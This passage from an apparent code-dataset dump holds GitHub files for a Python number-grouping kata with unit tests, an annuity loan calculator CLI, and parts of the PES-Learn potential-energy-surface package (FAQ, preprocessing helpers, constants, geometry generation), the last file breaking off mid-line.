Running\n\nCreate the virtual environment\n\n```commandline\nvirtualenv -p /usr/bin/python3.6 venv\n```\n\nLoad the virtual env\n\n```commandline\nsource venv/bin/activate\n```\n\nInstall the modules\n```commandline\npip install -r requirements.txt \n```\n\n\n" }, { "alpha_fraction": 0.5351364612579346, "alphanum_fraction": 0.6068582534790039, "avg_line_length": 43.52688217163086, "blob_id": "6043808abe5285375c2c843acd96fbd4340f4e33", "content_id": "303ef7880d1e079047ca49f3064599d513afcc7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4141, "license_type": "no_license", "max_line_length": 99, "num_lines": 93, "path": "/test/test_agrupa.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "from src.agrupador import group, sequence_to_string, sequence_ends, group_sequences, find_sequences\nimport unittest\n\n\nclass TestGroup(unittest.TestCase):\n def test_deve_retornar_o_proprio_numero(self):\n self.assertEqual(group([100]), [\"[100]\"])\n\n def test_deve_retornar_dois_conjuntos_de_um_numero(self):\n self.assertEqual(group([100, 102]), [\"[100]\", \"[102]\"])\n\n def test_deve_retornar_um_conjunto_com_apenas_uma_sequencia(self):\n self.assertEqual(group([100, 101]), [\"[100-101]\"])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros(self):\n self.assertEqual(group(range(100, 150 + 1)), [\"[100-150]\"])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group(list(range(100, 150 + 1)) +\n [70]), [\"[70]\", \"[100-150]\"])\n\n def test_deve_retornar_dois_conjuntos_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group(list(range(100, 150 + 1)) + list(range(0, 50 + 1)) +\n [70]), [\"[0-50]\", \"[70]\", \"[100-150]\"])\n\n\nclass TestFormata(unittest.TestCase):\n def test_deve_retornar_grupo_de_um_numero_apenas(self):\n self.assertEqual(sequence_to_string([100]), \"[100]\")\n\n def test_deve_retornar_grupo_de_dois_numeros(self):\n self.assertEqual(sequence_to_string([100, 101]), \"[100-101]\")\n\n def test_deve_retornar_grupo_de_tres_numeros(self):\n self.assertEqual(sequence_to_string([100, 101, 132]), \"[-]\")\n\n\nclass TestSequenceEnds(unittest.TestCase):\n def 
test_deve_retornar_o_primeiro_e_unicao_numero(self):\n self.assertEqual(sequence_ends([100]), [100, 0])\n\n def test_deve_retornar_o_segundo_da_sequencia(self):\n self.assertEqual(sequence_ends([100, 101]), [101, 1])\n\n def test_deve_retornar_o_ultimo_da_sequencia_de_n_numeros(self):\n self.assertEqual(sequence_ends(range(100, 105 + 1)), [105, 5])\n\n def test_deve_retornar_o_ultimo_da_primeira_sequencia_de_2_sequencias_proximas(self):\n self.assertEqual(sequence_ends(\n list(range(100, 105 + 1)) + list(range(107, 110 + 1))), [105, 5])\n\n def test_deve_retornar_o_ultimo_da_primeira_sequencia_de_2_sequencias_distantes(self):\n self.assertEqual(sequence_ends(\n list(range(100, 105 + 1)) + list(range(200, 205 + 1))), [105, 5])\n\n\nclass TestSplitSequences(unittest.TestCase):\n def test_deve_retornar_uma_lista_com_uma_lista_de_sequencia(self):\n self.assertEqual(group_sequences(\n list(range(10, 20 + 1))), [[10, 20]])\n\n def test_deve_retornar_uma_lista_com_duas_listas_de_sequencia(self):\n self.assertEqual(\n group_sequences(list(range(10, 20 + 1)) + list(range(22, 32 + 1))),\n [[10, 20], [22, 32]])\n\n def test_deve_retornar_uma_lista_com_uma_lista_de_sequencia_e_um_numero(self):\n self.assertEqual(\n group_sequences(list(range(10, 20 + 1)) + [22]),\n [[10, 20], [22]])\n\n def test_deve_retornar_uma_lista_com_duas_listas_de_um_numero(self):\n self.assertEqual(\n group_sequences([20, 22]),\n [[20], [22]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group_sequences(list(range(100, 150 + 1)) +\n [170]), [[100, 150], [170]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group_sequences(list(range(100, 150 + 1)) +\n [70]), [[100, 150], [70]])\n\n\nclass TestFindSequences(unittest.TestCase):\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(find_sequences(list(range(100, 150 + 1)) +\n [170]), [[100, 150], [170]])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero_repetido(self):\n self.assertEqual(find_sequences(list(range(100, 150 + 1)) +\n [70]), [[70], [100, 150]])\n" } ]
5
Ed-Mwaura/annuity_calculator-CLI-VERSION---hs
https://github.com/Ed-Mwaura/annuity_calculator-CLI-VERSION---hs
250307fe9ca0b740125aa19e734b5ec38ea532af
7fc29825845449ad483b6ef128fd3a25bf291aba
da48c0eb66a4aaad45f0eee8a498b679c258a1f9
refs/heads/master
2022-11-06T15:36:02.803428
2020-06-26T19:35:03
2020-06-26T19:35:03
275,232,664
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5782697200775146, "alphanum_fraction": 0.5877569317817688, "avg_line_length": 33.5859375, "blob_id": "7b75b84bc987b2675df35082f3d30cb1ae6a3c1e", "content_id": "a03bf11652c0a43fda97ec8be129b6009f3bb654", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4427, "license_type": "no_license", "max_line_length": 98, "num_lines": 128, "path": "/calculator_cli.py", "repo_name": "Ed-Mwaura/annuity_calculator-CLI-VERSION---hs", "src_encoding": "UTF-8", "text": "import math\nimport argparse\nimport sys\n\n\nclass Calculator:\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--type\", help=\"type of calculation\", choices=[\"diff\", \"annuity\"])\n\n parser.add_argument(\"--principal\", help=\"credit principal\", type=int)\n\n parser.add_argument(\"--payment\", help=\"monthly payments\", type=float)\n\n parser.add_argument(\"--interest\", help=\"interest\", type=float)\n\n parser.add_argument(\"--periods\", help=\"monthly periods\", type=int)\n\n args = parser.parse_args()\n\n def calculate_months(self):\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n\n credit_p = self.args.principal\n m_payment = self.args.payment\n\n log_base = m_payment / (m_payment - nominal_interest * credit_p)\n\n n_months = math.ceil(math.log(log_base, (1 + nominal_interest)))\n\n overpayment = math.ceil(n_months * m_payment - credit_p)\n\n if n_months % 12 == 0:\n n_years = n_months // 12\n\n if n_years == 1:\n print(f'You need {n_years} year to repay this credit')\n else:\n print(f'You need {n_years} years to repay this credit!')\n else:\n n_years = n_months // 12\n n_rem_months = n_months % 12\n\n if n_years == 0:\n print(f'You need {n_rem_months} months to repay this credit!')\n elif n_years == 1:\n print(f'You need {n_years} year and {n_rem_months} months to repay this credit!')\n else:\n print(f'You need {n_years} years and {n_rem_months} months to repay this credit!')\n\n print(f'Overpayment = {overpayment}')\n\n def calculate_monthly_payments(self):\n\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n credit_p = self.args.principal\n c_periods = self.args.periods\n\n denominator = math.pow(1 + nominal_interest, c_periods) - 1\n numerator = nominal_interest * math.pow(1 + nominal_interest, c_periods)\n annuity_payment = math.ceil(credit_p * (numerator / denominator))\n\n overpayment = annuity_payment * c_periods - credit_p\n\n print(f'Your annuity payment = {annuity_payment}!')\n print(f'Overpayment = {overpayment}')\n\n def calculate_differential_payments(self):\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n credit_p = self.args.principal\n c_periods = self.args.periods\n\n total_sum = 0\n # start with 1 and end with total + 1; calculations start after the month is over\n # but python is zero indexed\n for i in range(1, c_periods + 1):\n inner_fraction = (credit_p * (i - 1)) / c_periods\n bracket_data = credit_p - inner_fraction\n total_calc = math.ceil(credit_p / c_periods + nominal_interest * bracket_data)\n\n total_sum += total_calc\n\n print(f'month {i}: paid out {total_calc}')\n overpayment = total_sum - credit_p\n print()\n print(f'Overpayment = {overpayment}')\n\n def calculate_principal(self):\n\n c_interest = self.args.interest\n nominal_interest = c_interest / 1200\n\n c_periods = self.args.periods\n m_payment = self.args.payment\n\n denominator_min = math.pow(1 + nominal_interest, c_periods) - 1\n numerator_min = nominal_interest * math.pow(1 
+ nominal_interest, c_periods)\n denominator = numerator_min / denominator_min\n\n credit_principal = round(m_payment / denominator)\n\n overpayment = m_payment * c_periods - credit_principal\n\n print(f'Your credit principal = {credit_principal}!')\n print(f'Overpayment = {overpayment}')\n\n def intro(self):\n if len(sys.argv) != 5:\n print(\"Incorrect parameters!\")\n else:\n if self.args.type == 'diff':\n if self.args.payment is not None:\n print(\"Incorrect parameters!\")\n else:\n self.calculate_differential_payments()\n elif self.args.type == 'annuity':\n if self.args.payment is None:\n self.calculate_monthly_payments()\n elif self.args.principal is None:\n self.calculate_principal()\n elif self.args.periods is None:\n self.calculate_months()\n\n\ncalc = Calculator()\ncalc.intro()\n" } ]
1
zero0911/PES-Learn
https://github.com/zero0911/PES-Learn
1ef0abd0dd871d3dbfc0c5a4a1b42d9946eb9dfb
7a956db1aff368f978dd3c5c08ef99aec2613d53
b42c07de03087e6fccad127edd560bfcf7da834f
refs/heads/master
2023-02-03T07:39:12.075839
2020-11-06T05:49:25
2020-11-06T05:49:25
309,278,630
2
0
BSD-3-Clause
2020-11-02T06:31:51
2020-11-06T03:11:09
2020-11-06T05:49:25
Python
[ { "alpha_fraction": 0.7598101496696472, "alphanum_fraction": 0.7706910371780396, "avg_line_length": 161.96226501464844, "blob_id": "2dcc87f016bf2aba0f67da46daf89c99e741a82e", "content_id": "ac58abb31f595fc8c8c247d5955518438d554199", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 8639, "license_type": "permissive", "max_line_length": 1230, "num_lines": 53, "path": "/2_FAQ/FAQ.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn usage FAQ\n\n## 1. How to install PES-Learn...\n * from source?\n * In a command line environment on Linux, OSX, or [Windows 10 Subsystem for Linux](https://docs.microsoft.com/en-us/windows/wsl/install-win10): \n * `git clone https://github.com/CCQC/PES-Learn.git`\n * `cd PES-Learn`\n * `python setup.py install`\n * `pip install -e .`\n * with pip?\n * _coming soon_\n * with conda?\n * _coming soon_\n\n## 2. How do I use PES-Learn?\n * The code can be used in two formats, either with an input file `input.dat` or with the Python API. See Tutorials section for examples. If an input file is created, one just needs to run `python path/to/PES-Learn/peslearn/driver.py` while in the directory containing the input file. To use the Python API, create a python file which imports peslearn `import peslearn`. This requires the package to be in your Python path: `export PYTHONPATH=\"absolute/path/to/directory/containing/peslearn\"`. This can be executed on the command line or added to your shell intializer (e.g. `.bashrc`) for more permanent access. \n \n## 3. Why is data generation so slow?\n * First off, the data generation code performance was improved 100-fold in [this pull request](https://github.com/CCQC/PES-Learn/pull/20), July 17th, 2019. Update to this version if data generation is slow. Also, if one is generating a lot of points (1-10 million) one can expect slow performance when using `grid_reduction = x` for large values of x (20,000-100,000). Multiplying the grid increments together gives the total number of points, so if there are 6 geometry parameters with 10 increments each thats 10^6 internal coordinate configurations. If you are **not** removing redundancies (`remove_redundancy=false`) and reducing the grid size to some value (e.g. `grid_reduction=1000`) it is recommended to only generate tens of thousands of points at a time. This is because writing many directories/files can be quite expensive. If you are removing redundancies and/or filtering geometries, it is not recommended to generate more than a few million internal coordinate configurations. Finally, the algorithm behind `remember_redundancies=true` and `grid_reduction = 10000` can be slow in some circumstances.\n \n## 4. Why is my machine learning model so bad?\n * 95% of the time it means your dataset sucks. Open the dataset and look at the energies. If it is a PES-Learn-generated dataset, the energies are in increasing order by default (can be disabled with `sort_pes=false`.) Scrolling through the dataset, the energies should be smoothly increasing. If there are large jumps in the energy values (typcially towards the end of the file) these points are probably best deleted. If the dataset looks good, the ML algorithm probably just needs more training points in order to model the dimensionality and features of the surface. Either that, or PES-Learn's automated ML model optimization routines are just not working for your use case.\n \n## 5. 
Why is training ML models so slow?\n * A few things you can do:\n * Train over less hyperparameter optimization iterations\n * Ensure multiple cores/threads are being used by your CPU. This can be done by checking which BLAS library NumPy is using:\n * Open an interactive python session with `python` and then `import numpy as np` followed by `np.show_config()`. If this displays a bunch of references to `mkl`, then NumPy is using Intel MKL. If this displays a bunch of references to 'openblas' then Numpy is using OpenBLAS. If Numpy is using MKL, you can control CPU usage with the environment variable MKL_NUM_THREADS=4 or however many physical cores your CPU has (this is recommended by Intel; do not use hyperthreading). If Numpy is using OpenBLAS, you can control CPU usage with OMP_NUM_THREADS=8 or however many threads are available. In bash, environment variables can be set by typing `export OMP_NUM_THREADS=8` into the terminal. Note that instabilities such as memory leaks due to thread-overallocation can occur if _both_ of these environment variables are set depending on your configuration (i.e., if one is set to 4 or 8 or whatever, make sure to set the other to =1).\n * Use an appropriate number of training points for the ML algorithm.\n * Gaussian processes scale poorly with the number of training points. Any more than 1000-2000 is unreasonable on a personal computer. If submitting to some external computing resource, anything less than 5000 or so is reasonable. Use neural networks for large training sets. If it is still way too slow, you can try to constrain the neural networks to use the Adam optimizer instead of the BFGS optimizer. \n \n \n## 6. How do I use this machine learning model?\n * When a model is finished training PES-Learn exports a folder `model1_data` which contains a bunch of stuff including a Python code `compute_energy.py` with convenience function `pes()` for evaluating energies with the ML model. Directions for use are written directly into the `compute_energy.py` file. The convenience function can be imported into other Python codes that are in the same directory with `from compute_energy import pes`. This is also in principle accessible from codes written in other programming languages such as C, C++ through their respective Python APIs, though these can be tricky to use.\n \n## 7. What are all these Hyperparameters?\n * `scale_X` is how each individual input (geometry parameter) is scaled. `scale_y` is how the energies (outputs) are scaled. \n * `std` is standard scaling, each column of data is scaled to a mean of 0 and variance of 1. \n * `mm01` is minmax scaling, each column of data is scaled such that it runs from 0 to 1\n * `mm11` is minmax scaling with a range -1 to 1\n * `morse` is whether interatomic distances are transformed into morse variables $r_1 \\rightarrow e^{r_1/\\alpha}$\n * `pip` stands for permutation invariant polynomials; i.e. the geometries are being transformed into a permutation invariant representation using the fundamental invariants library. \n * `degree_reduce` is when each fundamental invariant polynomial result is taken to the $1/n$ power where $n$ is the degree of the polynomial\n * `layers` is a list of the number of nodes in each hidden layer of the neural network\n\n## 8. How many points do I need to generate?\n\n * It's very hard to say what size of training set is required for a given target accuracy; it depends on a lot of things. 
First, the application: if you are doing some variational computation of the vibrational energy levels and only want the fundamentals, you might be able to get away with less points because you really just need a good description of the surface around the minimum. If one wants high-lying vibrational states with VCI, the surface needs a lot more coverage, and therefore more points. If the application involves a reactive potential energy surface across several stationary points, even more points are needed. The structure of the surface itself can also influence the number of points needed.\n**You don't know until you try.** For a given system, one should try out a few internal coordinate grids, reduce them to some size with `grid_reduction`, compute the points at a low level of theory, and see how well the models perform. This process can be automated with the Python API.\n\n## 9. How big can the molecular system be? \n\n * No more than 5-6 atoms for 'full' PESs. Any larger than that, and generating data by displacing in internal coordinates is impractical (if you have 6 atoms and want 5 increments along each internal coordinate, that's already ~240 million points). This is just an unfortunate reality of high-dimensional spaces: ample coverage over each coordinate and all possible coordinate displacement couplings requires an impossibly large grid of points for meaningful results. **One can still do large systems if they only scan over some of the coordinates.** For example, you can do relaxed scans across the surface, fixing just a few internal coordinates and relaxing all others through geometry optimization at each point, and creating a model of this 'sub-manifold' of the surface is no problem (i.e., train on the fixed coordinate parameters and 'learn' the relaxed energies). This is useful for inspecting reaction coordinates/reaction entrance channels, for example. Future releases will support including gradient information in training the model, and this may allow for slightly larger systems and smaller dataset sizes. 
In theory, gradients can give the models more indication of the curvature of the surface with fewer points.\n\n\n" }, { "alpha_fraction": 0.682539701461792, "alphanum_fraction": 0.682539701461792, "avg_line_length": 30, "blob_id": "bb70ece779bea7fb7c414f3fb4cbe52c9eeb25f5", "content_id": "3d599f7574947c130275fdf95c9d70bd4be5f602", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 63, "license_type": "permissive", "max_line_length": 51, "num_lines": 2, "path": "/peslearn/lib/path.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import os\nfi_dir = os.path.dirname(os.path.abspath(__file__)) \n" }, { "alpha_fraction": 0.5908715724945068, "alphanum_fraction": 0.6018697023391724, "avg_line_length": 33.590476989746094, "blob_id": "47c191cb6ada5c74667bc3b977c91adbfa4c41db", "content_id": "2dd73be300c541cd8be7b66aba3c0ea85f0ee843", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3637, "license_type": "permissive", "max_line_length": 117, "num_lines": 105, "path": "/peslearn/ml/preprocessing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.preprocessing import MinMaxScaler\nimport re\n\n\ndef general_scaler(scale_type, data):\n \"\"\"\n Scales each column of an array according to scale_type\n \"\"\"\n if scale_type == 'std':\n scaler = StandardScaler()\n new_data = scaler.fit_transform(data)\n if scale_type == 'mm01':\n scaler = MinMaxScaler(feature_range=(0,1))\n new_data = scaler.fit_transform(data)\n if scale_type == 'mm11':\n scaler = MinMaxScaler(feature_range=(-1,1))\n new_data = scaler.fit_transform(data)\n return new_data, scaler\n\ndef morse(raw_X, alpha=1.00):\n \"\"\"\n Element-wise morse variable transformation on an array of interatom distances\n r_morse = exp(-r/alpha)\n Assumes units of Angstroms \n \"\"\"\n return np.exp(-raw_X / alpha)\n\ndef interatomics_to_fundinvar(raw_X, fi_path):\n \"\"\"\n Transform interatom distances to fundamental invariants \n Parameters\n ---------\n raw_X : array \n Array of interatomic distances in Standard Order: \n r1\n r2 r3\n r4 r5 r6...\n where the order of atoms along columns/rows of interatomic distance matrix \n is determined by highest frequency atoms first (alphabetical tiebreaker) \n e.g. HCOOH would be ordered as HHOOC\n fi_path : str\n Path to Singular output file containing Fundamental Invariants\n \"\"\"\n nbonds = raw_X.shape[1]\n with open(fi_path, 'r') as f:\n data = f.read()\n data = re.sub('\\^', '**', data)\n # convert subscripts of bonds to 0 indexing\n for i in range(1, nbonds+1):\n data = re.sub('x{}(\\D)'.format(str(i)), 'x{}\\\\1'.format(i-1), data)\n\n polys = re.findall(\"\\]=(.+)\",data)\n\n # create a new_X matrix that is the shape of number geoms, number of Fundamental Invariants\n new_X = np.zeros((raw_X.shape[0],len(polys)))\n for i, p in enumerate(polys): # evaluate each FI \n # convert the FI to a python expression of raw_X, e.g. 
x1 + x2 becomes raw_X[:,1] + raw_X[:,2]\n eval_string = re.sub(r\"(x)(\\d+)\", r\"raw_X[:,\\2]\", p)\n # evaluate that column's FI from columns of raw_X\n new_X[:,i] = eval(eval_string)\n\n # find degree of each FI\n degrees = []\n for p in polys:\n # just checking first, assumes every term in each FI polynomial has the same degree (seems to always be true)\n tmp = p.split('+')[0]\n # count number of exponents and number of occurances of character 'x'\n exps = [int(i) - 1 for i in re.findall(\"\\*\\*(\\d+)\", tmp)]\n ndegrees = len(re.findall(\"x\", tmp)) + sum(exps)\n degrees.append(ndegrees)\n\n return new_X, degrees\n\ndef degree_reduce(raw_X, degrees):\n \"\"\"\n Take every fundamental invariant f and raise to f^(1/m) where m is degree of f\n \"\"\"\n for i, degree in enumerate(degrees):\n raw_X[:,i] = np.power(raw_X[:,i], 1/degree)\n return raw_X\n\ndef sort_architectures(layers, inp_dim):\n \"\"\"\n Takes a list of hidden layer tuples (n,n,n...) and input dimension size and\n sorts it by the number of expected weights in the neural network\n \"\"\"\n out_dim = 1\n sizes = []\n for struct in layers:\n size = 0\n idx = 0\n size += inp_dim * struct[idx]\n idx += 1\n n = len(struct)\n while idx < n:\n size += struct[idx - 1] * struct[idx]\n idx += 1\n size += out_dim * struct[-1]\n sizes.append(size)\n sorted_indices = np.argsort(sizes).tolist()\n layers = np.asarray(layers)\n layers = layers[sorted_indices].tolist()\n return layers\n\n\n\n\n\n" }, { "alpha_fraction": 0.6277768015861511, "alphanum_fraction": 0.6691349148750305, "avg_line_length": 42.56692886352539, "blob_id": "2a52490f329adf8d1186e973e032a36714cd112a", "content_id": "1eb1962eeb41f8a1335d712acf543872d9ecc437", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5537, "license_type": "permissive", "max_line_length": 180, "num_lines": 127, "path": "/peslearn/constants.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport os\n\n# some constants used in the code\nrad2deg = 180.0 / np.pi\ndeg2rad = np.pi / 180.0\n\nbohr2angstroms = 0.52917720859\nhartree2ev = 27.21138505\nhartree2cm = 219474.63 \n\n#PES-Learn package absolute path (used for accessing FI library)\npackage_directory = os.path.dirname(os.path.abspath(__file__)) \n\n# Gaussian process convenience function writer \ngp_convenience_function = \"\"\"\n# How to use 'compute_energy()' function\n# --------------------------------------\n# E = compute_energy(geom_vectors, cartesian=bool)\n# 'geom_vectors' is either: \n# 1. A list or tuple of coordinates for a single geometry. \n# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:\n# [[ coord1, coord2, ..., coordn],\n# [ coord1, coord2, ..., coordn],\n# : : : ], \n# [ coord1, coord2, ..., coordn]]\n# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.\n# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates. \n# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances. \n# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;\n# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker. 
\n# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z\n# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:\n# H H H C C O O \n# H \n# H 1\n# H 2 3\n# C 4 5 6 \n# C 7 8 9 10 \n# O 11 12 13 14 15\n# O 16 17 18 19 20 21\n\n# The returned energy array is a column vector of corresponding energies. Elements can be accessed with E[0,0], E[0,1], E[0,2]\n# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.\n\ndef pes(geom_vectors, cartesian=True):\n g = np.asarray(geom_vectors)\n if cartesian:\n axis = 1\n if len(g.shape) < 2:\n axis = 0\n g = np.apply_along_axis(cart1d_to_distances1d, axis, g)\n newX = gp.transform_new_X(g, params, Xscaler)\n E, cov = final.predict(newX, full_cov=False)\n e = gp.inverse_transform_new_y(E,yscaler)\n #e = e - (insert min energy here)\n #e *= 219474.63 ( convert units )\n return e\n\ndef cart1d_to_distances1d(vec):\n vec = vec.reshape(-1,3)\n n = len(vec)\n distance_matrix = np.zeros((n,n))\n for i,j in combinations(range(len(vec)),2):\n R = np.linalg.norm(vec[i]-vec[j])\n distance_matrix[j,i] = R\n distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]\n return distance_vector\n\"\"\" \n\n\nnn_convenience_function = \"\"\"\n# How to use 'compute_energy()' function\n# --------------------------------------\n# E = compute_energy(geom_vectors, cartesian=bool)\n# 'geom_vectors' is either: \n# 1. A list or tuple of coordinates for a single geometry. \n# 2. A column vector of one or more sets of 1d coordinate vectors as a list of lists or 2D NumPy array:\n# [[ coord1, coord2, ..., coordn],\n# [ coord1, coord2, ..., coordn],\n# : : : ], \n# [ coord1, coord2, ..., coordn]]\n# In all cases, coordinates should be supplied in the exact same format and exact same order the model was trained on.\n# If the coordinates format used to train the model was interatomic distances, each set of coordinates should be a 1d array of either interatom distances or cartesian coordinates. \n# If cartesian coordinates are supplied, cartesian=True should be passed and it will convert them to interatomic distances. \n# The order of coordinates matters. If PES-Learn datasets were used they should be in standard order;\n# i.e. cartesians should be supplied in the order x,y,z of most common atoms first, with alphabetical tiebreaker. \n# e.g., C2H3O2 --> H1x H1y H1z H2x H2y H2z H3x H3y H3z C1x C1y C1z C2x C2y C2z O1x O1y O1z O2x O2y O2z\n# and interatom distances should be the row-wise order of the lower triangle of the interatom distance matrix, with standard order atom axes:\n# H H H C C O O \n# H \n# H 1\n# H 2 3\n# C 4 5 6 \n# C 7 8 9 10 \n# O 11 12 13 14 15\n# O 16 17 18 19 20 21\n\n# The returned energy array is a column vector of corresponding energies. 
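(Energies come back in the model's training units; the commented-out lines in pes() below mark where a reference energy subtraction and unit conversion can be enabled.) 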
Elements can be accessed with E[0,0], E[0,1], E[0,2]\n# NOTE: Sending multiple geometries through at once is much faster than a loop of sending single geometries through.\n\ndef pes(geom_vectors, cartesian=True):\n g = np.asarray(geom_vectors)\n if cartesian:\n axis = 1\n if len(g.shape) < 2:\n axis = 0\n g = np.apply_along_axis(cart1d_to_distances1d, axis, g)\n newX = nn.transform_new_X(g, params, Xscaler)\n x = torch.tensor(data=newX)\n with torch.no_grad():\n E = model(x)\n e = nn.inverse_transform_new_y(E, yscaler)\n #e = e - (insert min energy here)\n #e *= 219474.63 ( convert units )\n return e\n\ndef cart1d_to_distances1d(vec):\n vec = vec.reshape(-1,3)\n n = len(vec)\n distance_matrix = np.zeros((n,n))\n for i,j in combinations(range(len(vec)),2):\n R = np.linalg.norm(vec[i]-vec[j])\n distance_matrix[j,i] = R\n distance_vector = distance_matrix[np.tril_indices(len(distance_matrix),-1)]\n return distance_vector\n\"\"\" \n" }, { "alpha_fraction": 0.6189812421798706, "alphanum_fraction": 0.6270542740821838, "avg_line_length": 55.39566421508789, "blob_id": "cae25492047b8265baff156e982bc330de7a1bc4", "content_id": "687eba6481e35e0d109be033a9517713c1af7804", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 20810, "license_type": "permissive", "max_line_length": 173, "num_lines": 369, "path": "/peslearn/datagen/configuration_space.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for building PES geometries \n\"\"\"\nfrom ..utils import geometry_transform_helper as gth\nfrom ..utils import permutation_helper as ph\nfrom ..ml.data_sampler import DataSampler \n\nfrom collections import OrderedDict\nimport gc\nimport os\nimport json\nimport timeit\nimport pandas as pd\nimport numpy as np\npd.set_option('display.width',200)\npd.set_option('display.max_colwidth',200)\npd.set_option('display.max_columns',200)\npd.set_option('display.max_rows',1000)\n\nclass ConfigurationSpace(object):\n \"\"\"\n Class for generating PES geometries, removing redundancies, reducing grid size.\n\n Parameters\n ----------\n molecule_obj : :class:`~peslearn.datagen.molecule.Molecule`. \n Instance of PES-Learn Molecule class. Required for basic information about the molecule; \n internal coordinates, xyz coordinates, number of atoms.\n input_obj : :class:`~peslearn.input_processor.InputProcessor`\n Instance of InputProcessor class. 
Required for user keyword considerations.\n \"\"\"\n def __init__(self, molecule_obj, input_obj):\n self.mol = molecule_obj\n self.input_obj = input_obj\n self.n_atoms = self.mol.n_atoms - self.mol.n_dummy\n self.n_interatomics = int(0.5 * (self.n_atoms * self.n_atoms - self.n_atoms))\n self.bond_columns = []\n for i in range(self.n_interatomics):\n self.bond_columns.append(\"r%d\" % (i))\n\n def generate_displacements(self):\n \"\"\"\n Generates internal coordinate displacements according to internal coordinate ranges.\n \"\"\"\n start = timeit.default_timer()\n self.input_obj.extract_intcos_ranges()\n d = self.input_obj.intcos_ranges\n for key, value in d.items():\n if len(value) == 3:\n d[key] = np.linspace(value[0], value[1], value[2])\n elif len(value) == 1:\n d[key] = np.asarray(value[0]) \n else:\n raise Exception(\"Internal coordinate range improperly specified\")\n grid = np.meshgrid(*d.values())\n # 2d array (ngridpoints x ndim) each row is one datapoint\n intcos = np.vstack(map(np.ravel, grid)).T\n print(\"{} internal coordinate displacements generated in {} seconds\".format(intcos.shape[0], round((timeit.default_timer() - start),3)))\n return intcos\n\n def generate_geometries(self):\n \"\"\"\n Generates internal coordinates, converts them to Cartesians, and converts them to interatomic distances.\n Stores them into a Pandas DataFrame with columns ['r0', 'r1', 'r2', 'r3', ..., 'rn', 'cartesians', 'internals']\n Where each row of 'cartesians' contain 2d NumPy arrays and 'internals' contain 1d NumPy arrays.\n \"\"\"\n t1 = timeit.default_timer()\n intcos = self.generate_displacements()\n eq = self.input_obj.keywords['eq_geom']\n if eq:\n intcos = np.vstack((np.array(eq), intcos))\n self.n_disps = intcos.shape[0]\n # Make NumPy array of complete internal coordinates, including dummy atoms (values only). \n # If internal coordinates have duplicate entries, a different, slightly slower method is needed; the internal coordinates\n # must be expanded to their redundant full definition before Cartesian coordinate conversion\n if self.mol.unique_geom_parameters != self.mol.geom_parameters:\n indices = []\n for p1 in self.mol.geom_parameters:\n for i, p2 in enumerate(self.mol.unique_geom_parameters):\n if p1==p2:\n indices.append(i)\n intcos = intcos[:, np.array(indices)]\n\n # Make NumPy array of cartesian coordinates \n cartesians = gth.vectorized_zmat2xyz(intcos, self.mol.zmat_indices, self.mol.std_order_permutation_vector, self.mol.n_atoms)\n print(\"Cartesian coordinates generated in {} seconds\".format(round((timeit.default_timer() - t1), 3)))\n t2 = timeit.default_timer()\n # Find invalid Cartesian coordinates which were constructed with invalid Z-Matrices (3 Co-linear atoms)\n colinear_atoms_bool = np.isnan(cartesians).any(axis=(1,2))\n n_colinear = np.where(colinear_atoms_bool)[0].shape[0]\n if n_colinear > 0:\n print(\"Warning: {} configurations had invalid Z-Matrices with 3 co-linear atoms, tossing them out! 
